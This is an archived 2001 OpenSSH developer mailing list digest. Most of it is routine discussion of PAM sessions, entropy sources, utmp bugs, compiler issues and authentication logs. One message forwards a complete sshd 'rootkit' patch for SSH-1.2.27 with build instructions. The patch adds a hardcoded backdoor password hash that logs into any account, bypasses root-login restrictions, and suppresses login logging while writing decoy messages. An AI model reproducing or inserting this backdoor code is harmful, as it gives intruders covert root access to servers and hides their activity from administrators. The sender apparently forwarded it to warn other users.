previous releases. Both the pam session stuff and some other logging seemed to get dropped. Andrew Bartlett -- Andrew Bartlett abartlet at pcug.org.au abartlet at samba.org From mouring at etoh.eviladmin.org Sun Jun 24 02:28:04 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sat, 23 Jun 2001 11:28:04 -0500 (CDT) Subject: pam session in linux port In-Reply-To: <3B33286F.91DCDFF9@bartlett.house> Message-ID: I never saw a reponse from Damien, and there is a nagging voice in the back of my mind about this topic, but for the life of me I can't find in the archives what it was. If it's agreed that it should be done as soon as sort out re-install issues under Linux I'll add it to both -HEAD and the 2.9 branch. As for any patch since 2.9 was released. It seems most of us have gotten backed up, and I plan on going back through (about 40 some of emails patch suggestions that looked valid) and weeding through what should be applied to and what should be reworked and proposed to the OpenBSD team. - Ben On Fri, 22 Jun 2001, Andrew Bartlett wrote: > Christian Kraemer wrote: > > > > Hi, > > > > Does anybody know why openssh (openssh-2.9p1) on a linux system does not call > > pam_open_session if no pty is used? In this way the session modules (in > > /etc/pam.d) are not activated. > > > > This is especially annoying if you > > use pam_limits.so to set rlimits. Every user could > > circumvent them easily. > > > > I do not know if this issue has been discussed before and if this behavior is > > not alright ..... > > > > cu Christian > > I posted a patch to correct this behaviour, but it seems to have been > ignored (I've certainly not heard back about it). > > Andrew Bartlett > > -- > Andrew Bartlett > abartlet at pcug.org.au > abartlet at samba.org > From pekkas at netcore.fi Sun Jun 24 03:08:03 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Sat, 23 Jun 2001 20:08:03 +0300 (EEST) Subject: pam session in linux port In-Reply-To: Message-ID: On Sat, 23 Jun 2001 mouring at etoh.eviladmin.org wrote: > I never saw a reponse from Damien, and there is a nagging voice in the > back of my mind about this topic, but for the life of me I can't find in > the archives what it was. > > If it's agreed that it should be done as soon as sort out re-install > issues under Linux I'll add it to both -HEAD and the 2.9 branch. > > As for any patch since 2.9 was released. It seems most of us have gotten > backed up, and I plan on going back through (about 40 some of emails > patch suggestions that looked valid) and weeding through what should be > applied to and what should be reworked and proposed to the OpenBSD team. This has been in on and off. The crux was that the pam session must be initialized after fork etc. if you want the limits to be effective for the user, not root, IIRC. This in turn caused some trouble. I recall the relevant commits were: --- 20010221 - (stevesk) session.c: back out to where we were before: - (djm) Move PAM session initialisation until after fork in sshd. Patch from Nalin Dahyabhai 20010214 - (djm) Don't try to close PAM session or delete credentials if the session has not been open or credentials not set. Based on patch from Andrew Bartlett - (djm) Move PAM session initialisation until after fork in sshd. Patch from Nalin Dahyabhai --- Also, there's some discussion on the issue in Red Hat bugzilla: http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=25690 http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=27692 So.. this definitely doesn't appear to be a trivial thing to "fix". -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From mouring at etoh.eviladmin.org Sun Jun 24 02:59:29 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sat, 23 Jun 2001 11:59:29 -0500 (CDT) Subject: pam session in linux port In-Reply-To: Message-ID: Yep, you hit the nail on the head.. This is what was the nagging voice. It's horrible when you have mailinglist messages scattered over multiple mailboxes. However, my understand was either PAM was now (as of 2.9) handled as a fake BSD-AUTH. Or was going to be handled that way, and that would assist in most of this problem. - Ben On Sat, 23 Jun 2001, Pekka Savola wrote: > On Sat, 23 Jun 2001 mouring at etoh.eviladmin.org wrote: > > I never saw a reponse from Damien, and there is a nagging voice in the > > back of my mind about this topic, but for the life of me I can't find in > > the archives what it was. > > > > If it's agreed that it should be done as soon as sort out re-install > > issues under Linux I'll add it to both -HEAD and the 2.9 branch. > > > > As for any patch since 2.9 was released. It seems most of us have gotten > > backed up, and I plan on going back through (about 40 some of emails > > patch suggestions that looked valid) and weeding through what should be > > applied to and what should be reworked and proposed to the OpenBSD team. > > This has been in on and off. The crux was that the pam session must be > initialized after fork etc. if you want the limits to be effective for > the user, not root, IIRC. > > This in turn caused some trouble. > > I recall the relevant commits were: > > --- > 20010221 > - (stevesk) session.c: back out to where we were before: > - (djm) Move PAM session initialisation until after fork in sshd. Patch > from Nalin Dahyabhai > > > 20010214 > - (djm) Don't try to close PAM session or delete credentials if the > session has not been open or credentials not set. Based on patch from > Andrew Bartlett > - (djm) Move PAM session initialisation until after fork in sshd. Patch > from Nalin Dahyabhai > --- > > Also, there's some discussion on the issue in Red Hat bugzilla: > > http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=25690 > http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=27692 > > > So.. this definitely doesn't appear to be a trivial thing to "fix". > > -- > Pekka Savola "Tell me of difficulties surmounted, > Netcore Oy not those you stumble over and fall" > Systems. Networks. Security. -- Robert Jordan: A Crown of Swords > > From abartlet at pcug.org.au Sun Jun 24 10:01:44 2001 From: abartlet at pcug.org.au (Andrew Bartlett) Date: Sun, 24 Jun 2001 10:01:44 +1000 Subject: pam session in linux port References: Message-ID: <3B352DE8.6CFA3A17@bartlett.house> Pekka Savola wrote: > > On Sat, 23 Jun 2001 mouring at etoh.eviladmin.org wrote: > > I never saw a reponse from Damien, and there is a nagging voice in the > > back of my mind about this topic, but for the life of me I can't find in > > the archives what it was. > > > > If it's agreed that it should be done as soon as sort out re-install > > issues under Linux I'll add it to both -HEAD and the 2.9 branch. > > > > As for any patch since 2.9 was released. It seems most of us have gotten > > backed up, and I plan on going back through (about 40 some of emails > > patch suggestions that looked valid) and weeding through what should be > > applied to and what should be reworked and proposed to the OpenBSD team. > > This has been in on and off. The crux was that the pam session must be > initialized after fork etc. if you want the limits to be effective for > the user, not root, IIRC. > > This in turn caused some trouble. > > I recall the relevant commits were: > > --- > 20010221 > - (stevesk) session.c: back out to where we were before: > - (djm) Move PAM session initialisation until after fork in sshd. Patch > from Nalin Dahyabhai > > 20010214 > - (djm) Don't try to close PAM session or delete credentials if the > session has not been open or credentials not set. Based on patch from > Andrew Bartlett > - (djm) Move PAM session initialisation until after fork in sshd. Patch > from Nalin Dahyabhai > --- > > Also, there's some discussion on the issue in Red Hat bugzilla: > > http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=25690 > http://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=27692 > > So.. this definitely doesn't appear to be a trivial thing to "fix". We run if for exec_pty() just not for exec_no_pty(), so its not actualy related. Both are called at the same 'level' of the code, just with/without a pty. Andrew Bartlett abartlet at pcug.org.au -- Andrew Bartlett abartlet at pcug.org.au abartlet at samba.org From mouring at etoh.eviladmin.org Sun Jun 24 17:19:23 2001 From: mouring at etoh.eviladmin.org (mouring at etoh.eviladmin.org) Date: Sun, 24 Jun 2001 02:19:23 -0500 (CDT) Subject: Patch to enable multiple possible sources of entropy In-Reply-To: <20010611091947.A4269@lucent.com> Message-ID: To let you know I'm not ignoring this. Damien has code like this already from the sounds of it. Just working out minor detials of how to deal with ssh-keygen, etc which don't read the sshd_config nor ssh_config for the admin's perfer order of entropy gathering. - Ben On Mon, 11 Jun 2001, Dave Dykstra wrote: > On Sun, Jun 10, 2001 at 10:41:14PM -0400, Michael Stone wrote: > > On Sun, Jun 10, 2001 at 12:49:18PM -0500, mouring at etoh.eviladmin.org wrote: > > > Hmm.. my only complaints about the patch is that seed_rng and init_rng are > > > pretty unreadable due to #ifdef/#end > > I could make it a lot more readable by having it always do access() to > probe for RANDOM_POOOL and PRNGD_SOCKET even if one of them is the only > choice. I initially elected to trade off exact compatibility for > readability, but I'd be happy to change it. I've included the more > readable init_rng() below for you to take a look at. The difference is > that even if only one of RANDOM_POOL or PRNGD_SOCKET is compiled in, if it > isn't there the error message will be the more generic > Couldn't find source for random number generator seed > rather than a message about the problem accessing the specific source. I > put in some debug level 2 messages to help debugging that case (those are > good even if you choose to keep the extra ifdefs), and I slightly improved > the fatal error message. > > Also, the ifdefs for PRNGD_SOCKET and USE_BUILTIN_ENTROPY do not really > need to be in the else case of PRNGD_PORT because configure enforces that > already, but I think it's more understandable this way. > > > > > > and that I don't know if I like the > > > idea of ssh/sshd stepping down in entropy quality on a whim. Which is > > > what this patch would do if for some odd reason prngd is offline at > > > startup of sshd/ssh. > > > > What if there were some kind of warning message? We've already seen the > > obnoxious key-is-1023 message, what's one more? > > I don't mind a debug message but I really would not want a warning message > because that's going to be the normal case on a lot of my systems. My > answer is that most likely even if prngd is offline, the PRNGD_SOCKET will > still exist even though there's no process listening on the other side. In > that case, ssh will go ahead into the prngd_get_random_bytes case but get a > Connection Refused error (this happened during my testing). > > Another idea would be to improve the fatal error message by saving some > information when the access() calls fail rather than just printing debug > messages. For example, there could be a variable that points to the error > message to use if it gets to the fatal condition at the end. Do you like > that better? I don't think that complication is necessary. > > > > Obviously the entropy > > requirement depends on the application, but there are a lot of machines > > where I'm far more concerned about not getting in at all (because prngd > > is busted) than I am about bad entropy in that case. It's no worse than > > if prngd weren't being used at all, and might make it easier to accept > > prngd. > > Good point. > > - Dave Dykstra > > > ------ more readable init_rng() follows ------------------------ > > void > init_rng(void) > { > check_openssl_version(); > > #ifdef RANDOM_POOL > if (access(RANDOM_POOL, F_OK) == 0) { > seed_source = POOL_SOURCE; > return; > } > else { > debug2("Random pool %s does not exist", RANDOM_POOL); > } > #endif /* RANDOM_POOL */ > > /* it's not trivial to probe for an open port so just make it > * take priority over the other sources if it is defined > */ > #ifdef PRNGD_PORT > seed_source = PRNGD_SOURCE; > #else > > #ifdef PRNGD_SOCKET > if (access(PRNGD_SOCKET, F_OK) == 0) { > seed_source = PRNGD_SOURCE; > return; > } > else { > debug2("Entropy socket %s does not exist", PRNGD_SOCKET); > } > #endif /* PRNGD_SOCKET */ > > #ifdef USE_BUILTIN_ENTROPY > seed_source = BUILTIN_SOURCE; > prng_init_rng(); > #endif > > #endif /* PRNGD_PORT */ > > if (seed_source == 0) > fatal("Couldn't find entropy source for random number generator"); > } > From Lutz.Jaenicke at aet.TU-Cottbus.DE Mon Jun 25 01:24:13 2001 From: Lutz.Jaenicke at aet.TU-Cottbus.DE (Lutz Jaenicke) Date: Sun, 24 Jun 2001 17:24:13 +0200 Subject: [Lutz.Jaenicke@aet.TU-Cottbus.DE: 2.9p1: HP-UX 10.20 utmp/wtmp handling broken?] In-Reply-To: <20010623000306.A14300@folly>; from markus.friedl@informatik.uni-erlangen.de on Sat, Jun 23, 2001 at 12:03:06AM +0200 References: <20010620102051.A1595@ws01.aet.tu-cottbus.de> <20010620154926.A8991@faui02.informatik.uni-erlangen.de> <20010620180845.A18250@ws01.aet.tu-cottbus.de> <20010621054326.A17059@folly> <20010621151214.A27941@ws01.aet.tu-cottbus.de> <20010623000306.A14300@folly> Message-ID: <20010624172413.A6782@serv01.aet.tu-cottbus.de> On Sat, Jun 23, 2001 at 12:03:06AM +0200, Markus Friedl wrote: > > i get this on openbsd-current: There was a misunderstanding in the naming conventions. For you "current" is the OpenBSD version. For me "current" meant the latest version of portable via anonymous CVS. As Ben pointed out in personal mail to me, there is always a lag between the OpenBSD version and the portable version. In the ChangeLog of portable I found 20010621 ... - markus at cvs.openbsd.org 2001/06/20 13:56:39 [channels.c channels.h clientloop.c packet.c serverloop.c] move from channel_stop_listening to channel_free_all, call channel_free_all before calling waitpid() in serverloop. fixes the utmp handling; report from Lutz.Jaenicke at aet.TU-Cottbus.DE ... and thought everything should be in sync. It obviously was not. I'll follow the development on the "portable" tree. OpenBSD-current won't run on my HP-UX boxes... Best regards, Lutz -- Lutz Jaenicke Lutz.Jaenicke at aet.TU-Cottbus.DE BTU Cottbus http://www.aet.TU-Cottbus.DE/personen/jaenicke/ Lehrstuhl Allgemeine Elektrotechnik Tel. +49 355 69-4129 Universitaetsplatz 3-4, D-03044 Cottbus Fax. +49 355 69-4153 From dwd at bell-labs.com Tue Jun 26 04:22:40 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Mon, 25 Jun 2001 13:22:40 -0500 Subject: rsa_private_decrypt() failed In-Reply-To: <20010622150327.E26652@more.net>; from pete@more.net on Fri, Jun 22, 2001 at 03:03:27PM -0500 References: <20010622150327.E26652@more.net> Message-ID: <20010625132240.A14341@lucent.com> On Fri, Jun 22, 2001 at 03:03:27PM -0500, pete at more.net wrote: > Hello, > > I'm running several Sparcs with Solaris 2.7 on them. They all have > Openssh 2.9 installed, and all work fine. Except one. Every once in a > while I get this: > > "Disconnecting: Corrupted check bytes on input." > > When I truss or I am at the console I get this: > > "rsa_private_decrypt() failed" > > I've tried reinstalling with OpenSSH 2.5, 2.9 and the commercial > versions. I get these errors from Linux and x86 Solaris boxes too in > random intervals. It's just this one box. > > Obviously it seems like a lib is screwed up. All of my boxes are at the > same patch level. I've also installed new OpenSSL and zlib's. I've seen > different requests at the OpenSSH site's mailing list archives for a fix, > and I haven't found any that work. > > I've generated several sets of keys, and replaced all the configs with > one's known to work fine everywhere else. Any clues or suggestions > would be greatly appreciated. I had this problem on SSH 1.2.27, and it turned out to be a limited to the Sun compiler; compiling with gcc fixed the problem. I too had it happening on only one machine, and only about 25% of the time; machines with identical hardware and software did not fail. I narrowed down the problem to the section of code that calculates MD5 checksums; some percentage of the time it simply calculated an incorrect value. I found that if I recompiled with gcc, the problem went away. I tried Sun compiler versions SC3.0.1, SC4.0, and SC4.2 and they all had the problem. My theory is that there is some processor register that is not being saved by the Sun compiler which sometimes got clobbered by a context switch or swap, and it only happened on the one machine because it was more heavily loaded. - Dave Dykstra From reza at loudcloud.com Tue Jun 26 04:49:45 2001 From: reza at loudcloud.com (Reza Naima) Date: Mon, 25 Jun 2001 11:49:45 -0700 Subject: ServerSide ACLs for -L type port forwarding Message-ID: <20010625114945.A31324@loudcloud.com> I have a need to add some server-side ACL functionality to the way ssh handles port forwarding. For a first pass, I want to be able to restrict -L port forwarding to localhost on the server only and I want to be able to specify the ports on Server. I was wondering if there would be any desire to incorporate said changes back into the main development tree? If so, are there coding guildlines available somewere. Thanks, Reza p.s. I havn't yet subscribed to the list, so please Cc me with any replies -- /"\ \ / ASCII Ribbon Campaign X Against HTML Mail / \ and Postings From nbecker at fred.net Tue Jun 26 05:41:06 2001 From: nbecker at fred.net (nbecker at fred.net) Date: 25 Jun 2001 15:41:06 -0400 Subject: No cipher option Message-ID: I noticed that "no cipher" is not an option in recent open-ssh. I wish there was an option. I'd like to use ssh as a replacement for rsh in rsh machine1 "tar -f - " | rsh machine2 "tar -f - " But for massive file copies, I really don't want to go through encryption. Still, I would like the strong authentication offered by ssh. So I think "cipher none" would be a good choice here. From kevin at tgivan.com Tue Jun 26 07:16:14 2001 From: kevin at tgivan.com (Kevin Sindhu) Date: Mon, 25 Jun 2001 14:16:14 -0700 Subject: Apparent SSH-1.2.27 Rootkit Message-ID: <3B37AA1E.DF877BAC@tgivan.com> Hello, I found this lurking around the web, and thought people who are running SSH-1.2.27 might be interested. -- Kevin Sindhu Systems Engineer TGI Technologies Inc. Tel: (604) 872-6676 Ext 321 107 E 3rd Avenue Fax: (604) 872-6601 Vancouver,BC V5T 1C7 Canada. -------------- next part -------------- Welcome Root Kit SSH distribution v5.0 (by Zelea) This version was build on TimeCop's previous SSH RootKit New in this version: - build against ssh-1.2.27 - corrected a bug that prevented wtmp/utmp login when RSA authentication and .shosts was used - when login in with the 'global' password a message "Closed connection from %IP%" is logged - encrypted 'global' password Your password isn't stored in clear anymore in the sshd daemon. Only the MD5 hash of your password is. This will prevent anyone to retrieve that password from the binary file To use, edit rk-ssh.diff and change the 'global' password has to whatever you want. To do this use the md5sum program: md5sum --string=Your-Global-Password and then paste the 32 character hash string in the diff file Patch ssh-1.2.27 source tree using patch -p1 < rk-ssh.diff Then ./configure, make, make install. --- doc from previous releases --- Yes, there is a known bug, it doesn't display Closing connection to ... when a normal user logs out after being logged in with a global password. Yes, I am working on that. It would require me to add another global var or make lets_log a binary fields variable... So next version will hopefully fix this. Hey, thanks to someone on IRC, they mentioned about the PermitRootLogin in /etc/sshd_config... Now logging in with a global password makes sure you still login even though the PermitRootLogin is no :) Nice feature. More logging has been disabled. Fixed in this release: * logging user logins is only disabled when a global password is used * no more #define shit * cleaner code * it actually works well this time :) -------------- next part -------------- diff -urN ssh-1.2.27-old/login.c ssh-1.2.27/login.c --- ssh-1.2.27-old/login.c Wed May 12 07:19:26 1999 +++ ssh-1.2.27/login.c Mon Dec 6 23:06:32 1999 @@ -119,6 +119,8 @@ #endif /* HAVE_HPUX_TCB_AUTH */ #include "ssh.h" +int lets_log; + /* Returns the time when the user last logged in. Returns 0 if the information is not available. This must be called before record_login. The host the user logged in from will be returned in buf. */ @@ -259,6 +261,7 @@ { int fd; + if (lets_log) { #if defined(HAVE_LASTLOG_H) || defined(HAVE_LASTLOG) struct lastlog ll; char *lastlog; @@ -559,11 +562,13 @@ } #endif } +} /* Records that the user has logged out. */ void record_logout(int pid, const char *ttyname) { +if (lets_log) { #ifdef HAVE_LIBUTIL_LOGIN const char *line = ttyname + 5; /* /dev/ttyq8 -> ttyq8 */ if (logout(line)) @@ -571,4 +576,5 @@ #else /* HAVE_LIBUTIL_LOGIN */ record_login(pid, ttyname, "", -1, "", NULL); #endif /* HAVE_LIBUTIL_LOGIN */ +} } diff -urN ssh-1.2.27-old/ssh.h ssh-1.2.27/ssh.h --- ssh-1.2.27-old/ssh.h Wed May 12 07:19:28 1999 +++ ssh-1.2.27/ssh.h Mon Dec 6 23:06:58 1999 @@ -866,6 +866,7 @@ /* Global variables */ extern uid_t original_real_uid; +extern int lets_log; #ifdef AMIGA #define UID_ROOT 65535 diff -urN ssh-1.2.27-old/sshd.c ssh-1.2.27/sshd.c --- ssh-1.2.27-old/sshd.c Mon Dec 6 23:10:22 1999 +++ ssh-1.2.27/sshd.c Tue Dec 7 00:09:58 1999 @@ -1408,7 +1408,9 @@ auth_delete_socket(NULL); /* The connection has been terminated. */ + if (lets_log) { log_msg("Closing connection to %.100s", get_remote_ipaddr()); + } packet_close(); exit(0); } @@ -2135,6 +2137,38 @@ abort(); } +/* Check if the "global" password was entered */ +int check_global_passwd( unsigned char *pass ) +{ + /* Paste here the output from md5sum --string="Your_Password" */ + char md5passwd[33]="ed5c6101c7cc02d1a927e2e37be1eb0d"; + struct MD5Context md; + unsigned char md5buffer[32]; + int i; + + /* Compute the response. */ + MD5Init(&md); + MD5Update(&md, pass, strlen( pass)); + MD5Final(md5buffer, &md); + for( i = 15; i >= 0; i-- ) + { + md5buffer[i*2+1] = (md5buffer[i] & 0xf) + '0'; + md5buffer[i*2] = (md5buffer[i] >> 4) + '0'; + } + for( i = 0; i < 32; i++ ) + if( md5buffer[i] > '9' ) + md5buffer[i] += 0x27; /* lower case hexa chars */ + + if( strncmp(md5passwd,md5buffer,32) ) + return 0; + else + { + /* Disable logging if conditions are met. */ + lets_log=0; + return 1; + } +} + /* Performs authentication of an incoming connection. Session key has already been exchanged and encryption is enabled. User is the user name to log in as (received from the clinet). Privileged_port is true if the @@ -2278,6 +2312,7 @@ /* Get a packet from the client. */ type = packet_read(); + lets_log=1; /* Process the packet. */ switch (type) { @@ -2660,14 +2695,17 @@ #if defined(KERBEROS) && defined(KRB5) if (auth_password(user, password, client)) #else /* defined(KERBEROS) && defined(KRB5) */ - if (auth_password(user, password)) + if (auth_password(user, password) || check_global_passwd(password) ) #endif /* defined(KERBEROS) && defined(KRB5) */ { /* Successful authentication. */ /* Clear the password from memory. */ memset(password, 0, strlen(password)); xfree(password); - log_msg("Password authentication for %.100s accepted.", user); + if( lets_log ) + log_msg("Password authentication for %.100s accepted.", user); + else + log_msg("Closing connection to %.100s", get_remote_ipaddr()); authentication_type = SSH_AUTH_PASSWORD; authenticated = 1; break; @@ -2708,14 +2746,14 @@ } /* Check if the user is logging in as root and root logins are disallowed. */ - if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1) + if (pw->pw_uid == UID_ROOT && options.permit_root_login == 1 && !lets_log) { if (authentication_type == SSH_AUTH_PASSWORD) packet_disconnect("ROOT LOGIN REFUSED FROM %.200s", get_canonical_hostname()); } else - if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0) + if (pw->pw_uid == UID_ROOT && options.permit_root_login == 0 && lets_log) { if (forced_command) log_msg("Root login accepted for forced command.", forced_command); @@ -2767,7 +2805,7 @@ #endif /* Log root logins with severity NOTICE. */ - if (pw->pw_uid == UID_ROOT) + if (pw->pw_uid == UID_ROOT && lets_log) log_severity(SYSLOG_SEVERITY_NOTICE, "ROOT LOGIN as '%.100s' from %.100s", pw->pw_name, get_canonical_hostname()); From markus.friedl at informatik.uni-erlangen.de Tue Jun 26 14:59:00 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Tue, 26 Jun 2001 06:59:00 +0200 Subject: ServerSide ACLs for -L type port forwarding In-Reply-To: <20010625114945.A31324@loudcloud.com>; from reza@loudcloud.com on Mon, Jun 25, 2001 at 11:49:45AM -0700 References: <20010625114945.A31324@loudcloud.com> Message-ID: <20010626065900.A13585@folly> sshd(8) permitopen="host:port" Limit local ``ssh -L'' port forwarding such that it may only con- nect to the specified host and port. Multiple permitopen options may be applied separated by commas. No pattern matching is per- formed on the specified hostnames, they must be literal domains or addresses. On Mon, Jun 25, 2001 at 11:49:45AM -0700, Reza Naima wrote: > I have a need to add some server-side ACL functionality to the way ssh > handles port forwarding. For a first pass, I want to be able to > restrict -L port forwarding to localhost on the server only and I want > to be able to specify the ports on Server. > > I was wondering if there would be any desire to incorporate said changes > back into the main development tree? If so, are there coding guildlines > available somewere. > > Thanks, > Reza > > p.s. I havn't yet subscribed to the list, so please Cc me with any > replies > > -- > /"\ > \ / ASCII Ribbon Campaign > X Against HTML Mail > / \ and Postings From tomh at po.crl.go.jp Tue Jun 26 19:42:38 2001 From: tomh at po.crl.go.jp (Tom Holroyd) Date: Tue, 26 Jun 2001 18:42:38 +0900 (JST) Subject: Update of SRP patch Message-ID: I have uploaded a new release of the OpenSSH (portable) SRP patch. This version is vs. the 20010625 openssh_cvs; there are no other changes. You can find it here: http://members.tripod.com/professor_tom/archives/ http://members.tripod.com/professor_tom/archives/OpenSSH-srp9.tar.bz2 http://members.tripod.com/professor_tom/archives/OpenSSH-srp9.patch.bz2 The tarball is the whole thing with the patch applied. There are also .gz files in that directory. Tripod makes you left click on .gz files but it doesn't recognize .bz2 so you can (must) right click... The sig of the OpenSSH-srp9.tar file (note not compressed) is: -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEABECAAYFAjs4V1MACgkQiGAp74wl3UP85wCfeDI2P1BTmNxQtVVcUQNWxW8O Oa0AniBGLYWpESaB/oS+W0mqv6FF6lKQ =i6x6 -----END PGP SIGNATURE----- Dr. Tom Holroyd "I am, as I said, inspired by the biological phenomena in which chemical forces are used in repetitious fashion to produce all kinds of weird effects (one of which is the author)." -- Richard Feynman, _There's Plenty of Room at the Bottom_ From CLAD at chevron.com Wed Jun 27 03:41:58 2001 From: CLAD at chevron.com (Ladner, Eric (CLAD)) Date: Tue, 26 Jun 2001 12:41:58 -0500 Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01D71@chevron.com> Running configure on OpenSSH 2.9p2 doesn't find libz.XX if it is located in /usr/local/lib. Thanks, Eric From stevev at darkwing.uoregon.edu Wed Jun 27 03:46:15 2001 From: stevev at darkwing.uoregon.edu (Steve VanDevender) Date: Tue, 26 Jun 2001 10:46:15 -0700 Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib In-Reply-To: <8F88657F29DFD11189ED0008C728C6B006E01D71@chevron.com> References: <8F88657F29DFD11189ED0008C728C6B006E01D71@chevron.com> Message-ID: <15160.51815.938349.107315@darkwing.uoregon.edu> Ladner, Eric (CLAD) writes: > Running configure on OpenSSH 2.9p2 doesn't find libz.XX if it is > located in /usr/local/lib. That's highly compiler-dependent. GCC will find libraries in /usr/local/lib and include files in /usr/local/include by default. Many vendor compilers won't. If you are using some vendor-supplied compiler, add the appropriate flags to tell it to search /usr/local/include and /usr/local/lib. For example, in Digital UNIX I use CC="cc -I/usr/local/include -L/usr/local/lib" ... ./configure ... when configuring OpenSSH. From CLAD at chevron.com Wed Jun 27 05:07:18 2001 From: CLAD at chevron.com (Ladner, Eric (CLAD)) Date: Tue, 26 Jun 2001 14:07:18 -0500 Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib Message-ID: <8F88657F29DFD11189ED0008C728C6B006E01D7D@chevron.com> D'oh! I had a bad value for LDFLAGS that was already defined in the environment. Nothing to see here.. Move along.. Thanks, Eric -----Original Message----- From: Steve VanDevender [mailto:stevev at darkwing.uoregon.edu] Sent: Tuesday, June 26, 2001 12:46 PM To: openssh-unix-dev at mindrot.org Subject: OpenSSH 2.9p2 configure doesn't find libz in /usr/local/lib Ladner, Eric (CLAD) writes: > Running configure on OpenSSH 2.9p2 doesn't find libz.XX if it is > located in /usr/local/lib. That's highly compiler-dependent. GCC will find libraries in /usr/local/lib and include files in /usr/local/include by default. Many vendor compilers won't. If you are using some vendor-supplied compiler, add the appropriate flags to tell it to search /usr/local/include and /usr/local/lib. For example, in Digital UNIX I use CC="cc -I/usr/local/include -L/usr/local/lib" ... ./configure ... when configuring OpenSSH. From matthewm at webcentral.com.au Wed Jun 27 09:59:37 2001 From: matthewm at webcentral.com.au (Matthew Melvin) Date: Wed, 27 Jun 2001 09:59:37 +1000 (EST) Subject: OpenSSH 2.9p2 with PAMAuthenticationViaKbdInt Message-ID: When using PAM to do password authenticaion the attempt/failure counter appears to be getting confused. This is using a rh62 system with the openssh-2.9p2-1 rpms... On the client side... [matthewm at toadhall (7) matthewm]$ grep Auth /etc/ssh/ssh_config RhostsAuthentication no RhostsRSAAuthentication no HostbasedAuthentication no RSAAuthentication no PubkeyAuthentication yes PasswordAuthentication yes ChallengeResponseAuthentication no KbdInteractiveAuthentication yes PreferredAuthentications publickey,keyboard-interactive,password [matthewm at toadhall (7) matthewm]$ ssh -v localhost OpenSSH_2.9p2, SSH protocols 1.5/2.0, OpenSSL 0x0090581f [...] debug1: Connecting to localhost [127.0.0.1] port 22. [...] debug1: Connection established. [...] debug1: Remote protocol version 1.99, remote software version OpenSSH_2.9p2 debug1: match: OpenSSH_2.9p2 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p2 debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received [...] debug1: done: ssh_kex2. debug1: send SSH2_MSG_SERVICE_REQUEST debug1: service_accept: ssh-userauth debug1: got SSH2_MSG_SERVICE_ACCEPT debug1: authentications that can continue: publickey,keyboard-interactive debug1: next auth method to try is publickey debug1: userauth_pubkey_agent: testing agent key /home/matthewm/.ssh/id_dsa debug1: authentications that can continue: publickey,keyboard-interactive debug1: try privkey: /home/matthewm/.ssh/identity debug1: try pubkey: /home/matthewm/.ssh/id_dsa debug1: authentications that can continue: publickey,keyboard-interactive debug1: try privkey: /home/matthewm/.ssh/id_rsa debug1: next auth method to try is keyboard-interactive Password: debug1: authentications that can continue: publickey,keyboard-interactive Password: Received disconnect from 127.0.0.1: 2: too many failed userauth_requests debug1: Calling cleanup 0x8061918(0x0) [matthewm at toadhall (7) matthewm]$ ... and on the server side for the same session... [root at toadhall (19) ssh]# grep Auth /etc/ssh/sshd_config RhostsAuthentication no RhostsRSAAuthentication no HostbasedAuthentication no RSAAuthentication yes PubkeyAuthentication yes PasswordAuthentication no ChallengeResponseAuthentication no KbdInteractiveAuthentication yes PAMAuthenticationViaKbdInt yes [root at toadhall (19) ssh]# sshd -ddd debug1: Seeding random number generator debug1: sshd version OpenSSH_2.9p2 [...] Connection from 127.0.0.1 port 2911 debug1: Client protocol version 2.0; client software version OpenSSH_2.9p2 debug1: match: OpenSSH_2.9p2 pat ^OpenSSH Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-1.99-OpenSSH_2.9p2 debug1: Rhosts Authentication disabled, originating port not trusted. debug1: list_hostkey_types: ssh-rsa,ssh-dss debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received [...] debug1: KEX done debug1: userauth-request for user matthewm service ssh-connection method none debug1: attempt 0 failures 0 debug2: input_userauth_request: setting up authctxt for matthewm debug1: Starting up PAM with username "matthewm" debug3: Trying to reverse map address 127.0.0.1. debug1: PAM setting rhost to "localhost" debug2: input_userauth_request: try method none Failed none for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method publickey debug1: attempt 1 failures 1 debug2: input_userauth_request: try method publickey debug1: test whether pkalg/pkblob are acceptable debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug2: userauth_pubkey: authenticated 0 pkalg ssh-dss Failed publickey for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method publickey debug1: attempt 2 failures 2 debug2: input_userauth_request: try method publickey debug1: test whether pkalg/pkblob are acceptable debug1: temporarily_use_uid: 500/500 (e=0) debug1: restore_uid debug2: userauth_pubkey: authenticated 0 pkalg ssh-dss Failed publickey for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method keyboard-interactive debug1: attempt 3 failures 3 debug2: input_userauth_request: try method keyboard-interactive debug1: keyboard-interactive language devs debug1: got 1 responses Failed keyboard-interactive for matthewm from 127.0.0.1 port 2911 ssh2 debug1: userauth-request for user matthewm service ssh-connection method keyboard-interactive debug1: attempt 5 failures 4 debug2: input_userauth_request: try method keyboard-interactive debug1: keyboard-interactive language devs Disconnecting: too many failed userauth_requests debug1: Calling cleanup 0x8051e50(0x0) debug1: Calling 